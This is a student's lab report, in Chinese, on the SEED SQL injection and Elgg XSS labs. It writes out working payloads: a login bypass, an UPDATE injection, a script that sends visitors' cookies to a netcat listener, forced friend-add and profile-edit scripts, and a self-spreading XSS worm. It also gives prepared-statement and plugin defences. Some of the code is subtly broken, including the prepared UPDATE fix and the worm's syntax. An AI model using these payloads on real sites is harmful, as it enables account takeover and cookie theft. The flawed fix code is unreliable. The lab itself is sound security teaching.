20232803 2023-2024-2 《网络攻防实践》实践十报告

- 1. 实践内容
- - 1.1 SEED SQL注入攻击与防御实验
  - 1.2 SEED XSS跨站脚本攻击实验(Elgg)
- 2. 实践过程
- - 2.1 SEED SQL注入攻击与防御实验
  - - 2.1.1 熟悉SQL语句
    - 2.1.2 对SELECT语句的SQL注入攻击
    - 2.1.3 对UPDATE语句的SQL注入攻击
    - 2.1.4 SQL对抗
  - 2.2 SEED XSS跨站脚本攻击实验(Elgg)
  - - 2.2.1 发布恶意消息，显示警报窗口
    - 2.2.2 弹窗显示cookie信息
    - 2.2.3 窃取受害者的cookies
    - 2.2.4 成为受害者的朋友
    - 2.2.5 修改受害者的信息
    - 2.2.6 编写XSS蠕虫
    - 2.2.7 对抗XSS攻击
- 3.学习中遇到的问题及解决
- 4.实践总结

1. 实践内容

1.1 SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

熟悉SQL语句：我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

SQL对抗：修复上述SQL注入攻击漏洞。

1.2 SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

弹窗显示cookie信息：将cookie信息显示。

窃取受害者的cookies：将cookie发送给攻击者。

成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

编写XSS蠕虫。

对抗XSS攻击。

2. 实践过程

本次实验使用的虚拟机是SEEDUbuntu-16.04，参考Ubuntu系统修改用户名和主机名修改主机名

2.1 SEED SQL注入攻击与防御实验

2.1.1 熟悉SQL语句

输入命令mysql -u root -p登录数据库，密码为seedubuntu
先输入命令use Users;使用数据库Users，再输入show tables;查看该数据库的表

可以看到该数据库含有两张表，分别是Tables_in_Users和credential
输入命令select * from Tables_in_Users;查看Tables_in_Users表中的字段和数据
输入命令select * from credential; 查看credential表中的字段和数据

查看Tables_in_Users表时，提示该表不存在
在credential表中可以看到该表中含有姓名、生日、工资、密码等字段，并且有6条数据

2.1.2 对SELECT语句的SQL注入攻击

自带的火狐浏览器中打开http://www.seedlabsqlinjection.com/
在该页面右键选择Inspect Element打开开发者工具，然后选择Network选项
输入任意的账号和密码，点击登录

可以看到，点击登录按钮后，该网站将用户输入的账号和密码作为路径参数，向unsafe_home.php页面发送了一个GET请求
在终端中输入命令vim /var/www/SQLInjection/unsafe_home.php查看unsafe_home.php的源码
- 首先从GET请求中获取账号和密码，并对密码进行哈希，然后检查是否存在已经登录的Session，接着与本地的数据库Users建立连接
- 建立连接后，使用SELECT语句根据账号和哈希后的密码查询用户的信息
- 接着我们可以发现管理员的账号为Admin
在实施SQL注入攻击之前，我们先对这条SELECT语句进行分析

SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password
FROM credential 
WHERE name= '$input_uname' and Password='$hashed_pwd';

这条语句的关键之处在于WHERE之后的条件判断
我们知道在SQL中#表示注释，如果我们在输入账号后紧接着输入一个单引号'将筛选条件终止，然后输入一个#将后面的SQL语句直接注释掉，那么这条SQL语句就能够直接被执行

前面我们知道了管理员的账号是Admin，根据上述分析，我们在该网站中输入账号Admin'#进行登录，不需要输入密码
点击登录按钮后可以看到成功登录，进入了管理员页面，能够看到所有用户的信息

对SELECT语句的SQL注入攻击成功！

2.1.3 对UPDATE语句的SQL注入攻击

刚才已成功登录Admin的账号，接着点击页面上方的Edit Profile
打开开发者工具，输入新的用户信息
点击保存按钮后，可以看到该网站向unsafe_edit_backend.php页面发送了一个GET请求
在终端中输入命令vim /var/www/SQLInjection/unsafe_edit_backend.php查看unsafe_edit_backend.php文件的源码

可以看到这里有两条UPDATE语句，这两条是类似的，区别在于一个设置了新密码，而另一个没有设置新密码。这两条语句的区别对于我们实施SQL注入没有太大影响。

UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;

与前一个SQL注入类似，这里我们可以在SET nickname = '后面添加自己想要修改的字段，并通过WHERE name = 'xxx'来指定用户，最后使用#将后面的SQL语句注释掉

在Edit Profile页面的NickName中输入wujinlong', SSN='20232803' where name='Alice';#，点击保存
可以看到修改成功，用户Alice的信息成功被修改

UPDATE语句的SQL注入攻击成功！

2.1.4 SQL对抗

该网站存在SQL注入漏洞的原因是代码和用户输入的数据没有隔离，而是写在了一起，导致无法区分原始SQL语句和用户输入的数据，让攻击者有机可乘
将SELECT语句修改如下

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

在这里插入图片描述

再次尝试登录
登录失败

修复成功
将UPDATE语句修改如下

# 第一条UPDATE语句
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address,$input_password, $input_phonenumber);
# 第二条UPDATE语句
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

在这里插入图片描述

再次尝试修改，之前对Alice的信息进行了修改，这次尝试修改Boby的信息
点击保存后，查看信息发现修改失败

修复成功！

2.2 SEED XSS跨站脚本攻击实验(Elgg)

2.2.1 发布恶意消息，显示警报窗口

打开网站http://www.xsslabelgg.com/ ，该网站的用户名即为上一节的数据库中存在的用户名。除管理员Admin以外，用户的登录密码均为seed + 用户名。
下面我们使用Alice登录，如上所述，密码为seedalice
点击Alice的头像，然后点击Edit profile进入修改个人信息页面
在Brief description中输入XSS攻击代码<script> alert('xss');</script>，该代码用于弹出一个窗口
保存之后，再次访问Alice的主页，弹出了警报窗口

2.2.2 弹窗显示cookie信息

在Brief description中输入XSS攻击代码<script> alert(document.cookie);</script>，该代码用于弹出一个窗口，窗口中显示Cookie信息
保存之后，再次访问Alice的主页，弹出了警报窗口，显示了Cookie信息

2.2.3 窃取受害者的cookies

在页面加载时，如果遇到img标签，浏览器会向src字段指示的url发送请求。利用这一特性，我们便可以构造出如下代码，并将其写入Boby的Brief description中。
当有用户访问Boby的主页时，该用户的cookie会被写到src字段中。通过document.write向页面写入了一个img标签，浏览器会把它当作是一张图片，向相应的地址和端口发送请求，请求中正携带了该用户的cookie信息

<script>document.write('<img src=http://127.0.0.1:2803?c=' + escape(document.cookie) + '>');
</script>

在这里插入图片描述

在终端中输入命令nc -l 2803 -v监听端口
以Alice的身份登录，访问Boby的主页http://www.xsslabelgg.com/profile/boby

成功监听到这一请求，并且获取了受害者Alice的Cookie

2.2.4 成为受害者的朋友

以Alice的身份登录，访问Boby的主页http://www.xsslabelgg.com/profile/boby，右键选择Inspect Element打开开发者工具，选择Network
点击左侧的Add friend按钮向Boby发送好友请求
点击Add friend按钮后，向http://www.xsslabelgg.com/action/friends/add发送了POST请求，并携带了三个参数

friend=45 //要添加的用户id
__elgg_ts=1715849723 //时间戳
__elgg_token=8s6rxvluUUz-8kY8-VbeoQ //token

于是构造如下js代码，用于强制添加好友

<script type="text/javascript">window.onload = function () {var Ajax = null;var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;var token = "&__elgg_token=" + elgg.security.token.__elgg_token;var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}</script>

打开Alice的Edit profile页面，点击About me右侧的Edit HTML，填写以上代码并保存
以Boby的身份登录，访问Alice的主页http://www.xsslabelgg.com/profile/alice，再回到Boby的主页

可以看到Boby自动将Alice添加为好友了

2.2.5 修改受害者的信息

与上一节相似，在Alice的Edit profile页面打开开发者工具的Network，点击保存按钮发送修改个人信息的请求

根据请求结果可知，修改个人信息时，向http://www.xsslabelgg.com/action/profile/edit发送了POST请求，并携带了多个字段信息

于是构造如下js代码，用于强制修改用户个人信息

<script type="text/javascript">window.onload = function(){var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;var content= token + ts + "name=" + userName + "&description=<p>Edited By 20232803wjl</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"var aliceGuid=44;if(elgg.session.user.guid!=aliceGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}
</script>

打开Alice的Edit profile页面，点击About me右侧的Edit HTML，填写以上代码并保存
以Boby的身份登录，访问Alice的主页http://www.xsslabelgg.com/profile/alice，再回到Boby的主页

Boby的个人信息成功被修改

2.2.6 编写XSS蠕虫

编写如下XSS蠕虫代码

<script id="worm" type="text/javascript">window.onload = function(){var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";var jsCode = document.getElementById("worm").innerHTML;var tailTag = "</" + "script>"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;//Construct the content of your url.var content= token + ts + "&name=" + userName + "&description=<p>XSS Attack By 20232803wjl"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"alert(content)var aliceGuid=44;if(elgg.session.user.guid!=aliceGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}
</script>

打开Alice的Edit profile页面，点击About me右侧的Edit HTML，填写以上代码并保存
以Boby的身份登录，访问Alice的主页后，再返回Boby的主页，此时发现Boby的个人信息已被修改
以Samy的身份登录，访问Boby的主页，再返回Samy的主页，此时发现Samy的个人信息也被修改了

由此可知，XSS蠕虫攻击成功！

2.2.7 对抗XSS攻击

以管理员Admin的身份进行登录，用户名为Admin，密码为seedelgg
登录后，依次点击右上角的Account - Administration
点击页面右侧的Plugins
找到HTMLawed，发现该插件已被激活，不需要再进行操作，该插件用于提供安全校验

注：显示Deactivate就表示已经激活了！！
如果是显示Activate，才需要点击Activate将其切换为Deactivate状态以激活该插件

再次以Samy的身份，访问Alice的主页

可以看到Alice主页里的XSS蠕虫代码已失效，对抗成功！

3.学习中遇到的问题及解决

问题1：在对抗XSS攻击实践中，激活了插件HTMLawed，但XSS攻击仍成功，也就是对抗失败了
解决方案：
- 经过检查，发现在Plugins插件页面中，插件左侧的按钮若显示Activate则表示插件未激活，若显示Deactivate则表示插件已激活
- 于是重新激活插件，成功对抗XSS攻击

4.实践总结

对于SQL注入和XSS攻击，以前只是了解但还未实践过，这一次的实践让我对它们有了直观的感受。SQL注入漏洞让用户可以随意的操作数据库进行增删改查，XSS蠕虫更是能够自我传播。这两个漏洞都是因为没有对用户输入的数据进行校验导致的，因此在开发阶段就应注意这些安全隐患。好在现如今许多开发框架都已替我们考虑到了这些安全漏洞，现在很少有网站存在SQL注入漏洞和XSS漏洞了。